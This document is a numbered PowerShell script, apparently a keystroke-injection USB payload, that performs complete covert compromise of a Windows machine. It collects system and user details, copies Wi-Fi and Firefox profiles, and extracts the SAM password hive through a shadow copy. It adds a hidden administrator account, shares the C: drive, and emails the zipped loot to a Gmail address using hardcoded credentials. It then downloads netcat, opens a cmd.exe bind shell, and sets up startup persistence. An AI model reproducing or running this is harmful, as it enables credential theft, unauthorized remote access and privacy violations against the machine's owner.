attiny

1. Import-Module 'Microsoft.PowerShell.Security'
2. $folderDateTime = "Test"
3. $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime
4. $fileSaveDir = New-Item  ($userDir) -ItemType Directory
5. $date = get-date
6. $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#c{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>"
7. $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html'
8. $Report = $Report + "<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>"
9. $SysBootTime = Get-WmiObject Win32_OperatingSystem  
10. $BootTime = $SysBootTime.ConvertToDateTime($SysBootTime.LastBootUpTime)| ConvertTo-Html datetime  
11. $SysSerialNo = (Get-WmiObject -Class Win32_OperatingSystem -ComputerName $env:COMPUTERNAME)  
12. $SerialNo = $SysSerialNo.SerialNumber  
13. $SysInfo = Get-WmiObject -class Win32_ComputerSystem -namespace root/CIMV2 | Select Manufacturer,Model  
14. $SysManufacturer = $SysInfo.Manufacturer  
15. $SysModel = $SysInfo.Model
16. $OS = (Get-WmiObject Win32_OperatingSystem -computername $env:COMPUTERNAME ).caption
17. $disk = Get-WmiObject Win32_LogicalDisk -Filter "DeviceID='C:'"
18. $HD = [math]::truncate($disk.Size / 1GB)
19. $FreeSpace = [math]::truncate($disk.FreeSpace / 1GB)
20. $HardSerial = Get-WMIObject Win32_BIOS -Computer $env:COMPUTERNAME | select SerialNumber
21. $HardSerialNo = $HardSerial.SerialNumber
22. $DriveLetter = $CDDrive.Drive
23. $DriveName = $CDDrive.Caption
24. $Disk = $DriveLetter + '\' + $DriveName
25. $Firewall = New-Object -com HNetCfg.FwMgr  
26. $FireProfile = $Firewall.LocalPolicy.CurrentProfile  
27. $FireProfile = $FireProfile.FirewallEnabled
28. $Report = $Report  + "<div id=left><h3>Computer Information</h3><br><table><tr><td>Operating System</td><td>$OS</td></tr><tr><td>OS Serial Number:</td><td>$SerialNo</td></tr><tr><td>Current User:</td><td>$env:USERNAME </td></tr><tr><td>System Uptime:</td><td>$BootTime</td></tr><tr><td>System Manufacturer:</td><td>$SysManufacturer</td></tr><tr><td>System Model:</td><td>$SysModel</td></tr><tr><td>Serial Number:</td><td>$HardSerialNo</td></tr><tr><td>Firewall is Active:</td><td>$FireProfile</td></tr></table></div><div id=right><h3>Hardware Information</h3><table><tr><td>Hardrive Size:</td><td>$HD GB</td></tr><tr><td>Hardrive Free Space:</td><td>$FreeSpace GB</td></tr><tr><td>System RAM:</td><td>$Ram GB</td></tr><tr><td>Processor:</td><td>$Cpu</td></tr><td>CD Drive:</td><td>$Disk</td></tr><tr><td>Graphics Card:</td><td>$graphics</td></tr></table></div>"  
29. $u = 0
30. $allUsb = @(get-wmiobject win32_volume | select Name, Label, FreeSpace)
31. $Report =  $Report + '<div id=right><h3>USB Devices</h3><table>'
32. do {
33. $gbUSB = [math]::truncate($allUsb[$u].FreeSpace / 1GB)
34. $Report = $Report + "<tr><td>Drive Name: </td><td> " + $allUsb[$u].Name + $allUsb[$u].Label + "</td><td>Free Space: </td><td>" + $gbUSB + "GB</td></tr>"
35. Write-Output $fullUSB
36. $u ++
37. } while ($u -lt $allUsb.Count)
38. $Report = $Report + '</table></div>'
39. $UserInfo = Get-WmiObject -class Win32_UserAccount -namespace root/CIMV2 | Where-Object {$_.Name -eq $env:UserName}| Select AccountType,SID,PasswordRequired  
40. $UserType = $UserInfo.AccountType
41. $UserSid = $UserInfo.SID
42. $UserPass = $UserInfo.PasswordRequired
43. $IsAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator')
44. $Report =  $Report + "<div id=left><h3>User Information</h3><br><table><tr><td>Current User Name:</td><td>$env:USERNAME</td></tr><tr><td>Account Type:</td><td> $UserType</td></tr><tr><td>User SID:</td><td>$UserSid</td></tr><tr><td>Account Domain:</td><td>$env:USERDOMAIN</td></tr><tr><td>Password Required:</td><td>$UserPass</td></tr><tr><td>Current User is Admin:</td><td>$IsAdmin</td></tr></table>"
45. $Report = $Report + '</div>'
46. $Report =  $Report + '<div id=left><h3>Shared Drives/Devices</h3>'
47. $Report =  $Report + (GET-WMIOBJECT Win32_Share | convertto-html Name, Description, Path)
48. $Report = $Report + '</div>'
49. $Report =  $Report + '<div id=c><h3> Installed Programs</h3> '
50. $Report =  $Report + (Get-WmiObject -class Win32_Product | ConvertTo-html  Name, Version,InstallDate)
51. $Report = $Report + '</table></div>'
52. $Report =  $Report + '<div id=c><h3> Installed Updates</h3>'  
53. $Report =  $Report +  (Get-WmiObject Win32_QuickFixEngineering -ComputerName $env:COMPUTERNAME | sort-object -property installedon -Descending | ConvertTo-Html   Description, HotFixId,Installedon,InstalledBy)
54. $Report = $Report + '</div>'
55. $Report =  $Report + '<div id=c><h3>User Documents (doc,docx,pdf,rar)</h3>'
56. $Report =  $Report + (Get-ChildItem -Path $userDir -Include *.doc, *.docx, *.pdf, *.zip, *.rar -Recurse |convertto-html Directory, Name, LastAccessTime)
57. $Report = $Report + '</div>'
58. $Report =  $Report + '<div id=c><h3>Network Information</h3>'
59. $Report =  $Report + (Get-WmiObject Win32_NetworkAdapterConfiguration -filter 'IPEnabled= True' | Select Description,DNSHostname, @{Name='IP Address ';Expression={$_.IPAddress}}, MACAddress | ConvertTo-Html)
60. $Report = $Report + '</table></div>'
61. $Computer = $env:COMPUTERNAME
62. $PortList = 0, 21, 22, 23, 25, 79, 80, 110, 113, 119, 135, 137, 139, 143, 389, 443, 445, 1002, 1024, 1030, 1720, 1900, 5000, 8080
63. $Report = $Report  + '<div id=right><h3>Port Scan of ' + $Computer + '</h3><table>'
64. foreach ($PortNumber in $PortList) {
65.  $PortCheck = New-Object Net.Sockets.TcpClient
66.  $PortCheck.Connect($Computer, $PortNumber)
67.  if ($PortCheck.Connected) {
68.  $Report = $Report  +  '<tr><td><b><font color=red>Port ' + $PortNumber + ' is open</font></b></td></tr>'}
69.  else {$Report = $Report  +  '<tr><td>Port ' + $PortNumber + ' is closed</td></tr>'}}
70. $Report = $Report + '</table></div>'
71. $wlanSaveDir = New-Item $userDir'\Duck\WLAN_PROFILES' -ItemType Directory
72. $srcDir = 'C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces'
73. Copy-Item $srcDir $wlanSaveDir -Recurse  
74. $fireSaveDir = New-Item $userDir'\Duck\FireFox-Profile' -ItemType Directory
75. $fireDir = (Get-ChildItem env:userprofile).value + '\AppData\Roaming\Mozilla\Firefox\Profiles'
76. $getFire = Get-Item -Path $fireDir -Exclude extensions
77. Copy-Item $getFire $fireSaveDir -Recurse
78. Start-Sleep -s 10
79. $createShadow = (gwmi -List Win32_ShadowCopy).Create('C:\', 'ClientAccessible')
80. $shadow = gwmi Win32_ShadowCopy | ? { $_.ID -eq $createShadow.ShadowID }
81. $addSlash  = $shadow.DeviceObject + '\'
82. cmd /c mklink C:\shadowcopy $addSlash
83. Copy-Item 'C:\shadowcopy\Windows\System32\config\SAM' $fileSaveDir
84. Remove-Item -recurse -force 'C:\shadowcopy'
85. Net User admin admin  /ADD
86. Net LocalGroup Administrators admin  /ADD  
87. reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList' /v admin /t REG_DWORD /d 0 /f
88. $Share = [WmiClass]'Win32_Share'
89. $Share.Create('C:\', 'netShare', 0)
90. netsh advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
91. $Report >> $fileSaveDir'/ComputerInfo.html'
92. function copy-ToZip($fileSaveDir){
93. $srcdir = $fileSaveDir
94. $zipFile = 'C:\Windows\Report.zip'
95. if(-not (test-path($zipFile))) {
96. set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18))
97. (dir $zipFile).IsReadOnly = $false}
98. $shellApplication = new-object -com shell.application
99. $zipPackage = $shellApplication.NameSpace($zipFile)
100. $files = Get-ChildItem -Path $srcdir
101. foreach($file in $files) {
102. $zipPackage.CopyHere($file.FullName)
103. while($zipPackage.Items().Item($file.name) -eq $null){
104. Start-sleep -seconds 1 }}}
105. copy-ToZip($fileSaveDir)
106. try {
107. $Sender = 'fritzbox.5491@gmail.com'
108. $Recipient = 'wasweisic@gmail.com'
109. $pass = ConvertTo-SecureString 'Digisparkrev3' -AsPlainText -Force
110. $creds = New-Object System.Management.Automation.PSCredential($sender.Split("@")[0], $pass)
111. Send-MailMessage -From $Sender -To $Recipient -Subject "DuckToolkit Report" -Body "Please find attached the DuckToolkit reconnaissance report." -SmtpServer "smtp.gmail.com" -UseSSL -credential $creds -Attachments "C:\Windows\Report.zip"}
112. catch {
113. break }
114. remove-item $fileSaveDir -recurse
115. remove-item 'C:\Windows\Report.zip'
116. Remove-Item $MyINvocation.InvocationName
117. cmd
118. cd c:\\
119. cmd powershell (new-object System.Net.WebClient).DownloadFile('https://drive.google.com/file/d/1jSMoQ_l7yb9zfbzE7egeTKmOubbxxrG3/view?usp=sharing/nc.exe','nc.exe')
120. exit
121. "nc -lp 443 -vv -e cmd.exe -L " | out-file Start.bat
122. @'
123. Set WshShell = CreateObject("WScript.Shell" )
124. WshShell.Run chr(34) & "C:\Start.bat" & Chr(34), 0
125. Set WshShell = Nothing
126. '@ | out-file invisible.vbs
127.  
128. netsh advfirewall firewall add rule name="Netcat" dir=in action=allow program="c:\nc.exe" enable=yes  
129. start invisible.vbs  
130. copy "invisible.vbs" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"